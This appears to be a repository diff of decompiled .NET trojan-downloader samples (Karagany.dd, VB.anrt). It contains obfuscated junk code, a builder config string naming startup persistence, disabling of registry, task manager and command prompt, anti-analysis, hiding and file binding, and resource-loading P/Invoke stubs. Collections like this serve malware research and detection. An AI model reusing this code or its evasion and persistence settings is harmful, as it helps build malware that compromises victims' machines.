int num8 = (int) Interaction.MsgBox((object) "edLKRyPRLjNUUVpyUWqrKybxOkkhyhFBJIUpKUCEwmgkLmSfZHpgiKyPRQaLDpPWEEFLfiZvKBInIvaCidPjComQVGkoTZCgMqaINJXXLzLqQadTIiOAJAKaHDXtBlpDCHVqBgusyBOHsIkmpezXMje");
int num9 = (int) Interaction.MsgBox((object) "kMMoLhTmjgfloVRarNurGpVEIjztbcsNnBEpfMTNVWGNvpoQCkSFSyQCLhkwmpQDfkXYOKeVbSfKDTxGajVpeUnhfrxhJgTUGdaQiOjLwiIEitczEaNWLqVvMdtdOoiOMuVtINOlbgzWEGKulWAcjCuuBEhMVCrmtzQjJwDwMbMootdvPmsjSttftkVIzLdquFUNGEjuxiD");
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
goto label_1;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
string str1;
string str2 = str1;
if (num2 == 0)
return str2;
ProjectData.ClearProjectError();
return str2;
}
public string lfVsFLnQnKMKfkiicCZksag(string flCOOwyHMmkfIfn)
{
int num1 = (int) Interaction.MsgBox((object) "taCzeBqxHQKLRuOqOJPUAtnkRUwLujdCVLqCYMXJFSQODJBmAYxtKQRINksvMKNMERCncFduJPxEpCGfWqxtfiiRpgVZPWOOHbOeXKuIqCdeOlnlFqvINH");
int num2 = (int) Interaction.MsgBox((object) "PuPqmapbKarfjNSCjYNtnrfrJuoasKKXdjFrVSeGdGzHFxWQROjJJgJJucWiCjcEjJCkoWFznQVcpQYbicTKoyJtgEDlxmUCJoXlyKuLYXwDGDjXcXodETcuU");
string str;
return str;
}
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/LOeaZpRhcXLrwit
+1
View File
@@ -0,0 +1 @@
SzRDHgVSMebxUsy||zXLgWNblUUHtUqE||uGKYtuFOJmDVpJD||sYhhfkWPWBNNcgj||1||BoxpBqUOoodZnUf||STARTUP||VALUE||EXE||DISABLE_REG||DISABLE_TSK||DISABLE_CMD||ANTIS||HIDE||0||MSG_BOX||MSG_ICO||MSG_TITLE||MSG_MESS||BIND_TRUE||BIND_RES||BIND_PASS||BIND_NAME
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/My/MyApplication.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MyApplication
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace SOUCHEIE.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[STAThread]
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MyComputer
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace SOUCHEIE.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/My/MyProject.cs
+207
View File
@@ -0,0 +1,207 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MyProject
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SOUCHEIE.My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
public Form1 Form1
{
get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
}
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/My/MySettings.cs
+68
View File
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MySettings
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace SOUCHEIE.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MySettingsProperty
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace SOUCHEIE.My
{
[DebuggerNonUserCode]
[HideModuleName]
[CompilerGenerated]
[StandardModule]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.Resources.Resources
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace SOUCHEIE.My.Resources
{
[CompilerGenerated]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[DebuggerNonUserCode]
[HideModuleName]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) SOUCHEIE.My.Resources.Resources.resourceMan, (object) null))
SOUCHEIE.My.Resources.Resources.resourceMan = new ResourceManager("SOUCHEIE.Resources", typeof (SOUCHEIE.My.Resources.Resources).Assembly);
return SOUCHEIE.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => SOUCHEIE.My.Resources.Resources.resourceCulture;
set => SOUCHEIE.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/SzRDHgVSMebxUsy
BIN
View File
Binary file not shown.
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/uGKYtuFOJmDVpJD
BIN
View File
Binary file not shown.
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/AssemblyInfo.cs
+16
View File
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyProduct("Product name")]
[assembly: Guid("694b4498-936e-469c-86fb-8d5608191d12")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("Trademark")]
[assembly: AssemblyCopyright("Copyright")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("Company name")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("File Description")]
[assembly: AssemblyTitle("Title")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Rjk3ibeceopw5x00uimwa5h2w/ch2futx3h3zpmhyzsblwlfrdktcnf3voh.cs
+29
View File
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: Rjk3ibeceopw5x00uimwa5h2w.ch2futx3h3zpmhyzsblwlfrdktcnf3voh
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
using System.Runtime.InteropServices;
namespace Rjk3ibeceopw5x00uimwa5h2w
{
public class ch2futx3h3zpmhyzsblwlfrdktcnf3voh
{
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr Pnqgzzjk5f0hyikci(string lpModuleName);
[DllImport("kernel32.dll", EntryPoint = "FindResourceA")]
public static extern IntPtr Ffz3mpnfyg4clsrkfrhqubycp(
IntPtr hModule,
int lpID,
string lpType);
[DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)]
public static extern IntPtr yeyqpjvohzgayjchvjm2bzdvn(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)]
public static extern uint Ncmhhqqsfk5fqfa4eo2qymkyp(IntPtr hModule, IntPtr hResInfo);
}
}
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Settings.xml
+1
View File
@@ -0,0 +1 @@
